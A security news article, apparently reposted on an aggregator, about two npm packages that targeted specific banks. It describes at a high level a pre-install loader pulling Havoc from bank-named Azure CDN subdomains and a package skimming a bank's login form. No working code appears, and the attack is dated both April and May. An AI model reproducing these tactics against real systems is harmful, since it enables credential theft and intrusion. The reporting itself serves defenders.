Banks in Attackers Crosshairs, via Open Source Software Supply Chain

  /     /     /  
Publicated : 23/11/2024   Category : security


Banks in Attackers Crosshairs, via Open Source Software Supply Chain


In separate targeted incidents, threat actors tried to upload malware into the Node Package Manager registry to gain access and steal credentials.



In two separate incidents, threat actors recently tried to introduce malware into the software development environment at two different banks via poisoned packages on the Node Package Manager (npm) registry.
Researchers at Checkmarx who observed the attacks believe them to be the first instances of adversaries targeting banks through the open source software supply chain. In a report this week, the vendor described the two attacks as part of larger trend they have observed recently where banks have been the specific targets.
These attacks showcased advanced techniques, including targeting specific components in Web assets of the victim bank by attaching malicious functionalities to it,
Checkmarx said
.
The vendor highlighted an April attack its report. In the incident, a threat actor posing as an employee of the target bank uploaded two malicious packages to the npm registry. Checkmarx researchers discovered a LinkedIn profile that suggested the package contributor worked at the target bank, and initially assumed the packages were part of a penetration test the bank was conducting.
The two npm packages contained a pre-install script that executed upon installation on a compromised system. The attack chain unfolded with the script first identifying the operating system of the host system. Then, depending on whether the OS is Windows, Linux, or MacOS, the script decrypted the appropriate encrypted files in the npm package. The attack chain continued with the decrypted files downloading a second-stage payload from an attacker-controlled command-and-control (C2) server.
The attacker cleverly utilized Azures CDN subdomains to effectively deliver the second-stage payload, Checkmarx said. This tactic is particularly clever because it bypasses traditional deny list methods, due to Azures status as a legitimate service. To make the attack even more credible and hard to detect, the threat actor used a subdomain that incorporated the name of the target bank.
Checkmarxs research showed the second-stage payload to be Havoc Framework, a popular open source penetration testing framework that organizations often use for security testing and auditing. Havoc has become a popular post-exploitation tool among threat actors because of its ability to evade Windows Defender and other standard endpoint security controls, Checkmarx said.
Deploying the Havoc framework would have given the attacker access to the infected machine inside the banks network, says Aviad Gershon, security researcher at Checkmarx, in comments to Dark Reading. From there, the consequences [would have been] dependent on the banks defenses and the attackers abilities and purpose — data theft, money theft, ransomware, etc.
The other attack that Checkmarx reported on this week happened in February. Here too, the threat actor — completely separate from the attacker in May — uploaded their own package containing a malicious payload to npm. In this instance, the payload was engineered specifically for the targeted bank. It was designed to hook onto a specific login form element on the bank

s website and to capture and transmit information that users entered into the form when logging into the site.
Characteristics in both npm packages made them specific not just to the banking industry in general but to the specific banks as well, Gershon says. The first attack we describe in the blog was obviously targeting a specific bank, falsifying a persona of a bank employee, and using crafted domains which include the banks name, he says. Both of these tactics were used in order to gain credibility and lure bank developers to download it. However, in this case, had another user not related to the bank downloaded the malicious package, they would have also been infected, Gershon adds.
In the second attack, the adversarys payload targeted a specific and unique HTML element in a specific application of a specific bank, he says. Hence in this instance this poisoned package would probably not have hurt other users downloading and installing it. The attacker motive in developing the package was to steal login credentials that users would have entered into the specific HTML element.
Attacks involving the use of poisoned packages on popular open source repositories and package managers such as
npm
and
PyPI
have surged in recent years. A study that ReversingLabs conducted earlier this year, in fact, found a
289% increase in attacks
on open source repositories since 2018. The goal behind many of these attacks is to
sneak malicious code
into enterprise software development environments to steal sensitive data and credentials, to surreptitiously install malware, and carry out other malicious activities.
The attacks that Checkmarx reported this week are the first known instances of banks being specific targets in such attacks.

Last News

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security

▸ Travel agency fined £150,000 for breaking Data Protection Act. ◂
Discovered: 23/12/2024
Category: security

▸ 7 arrested, 3 more charged in StubHub cyber fraud ring. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Banks in Attackers Crosshairs, via Open Source Software Supply Chain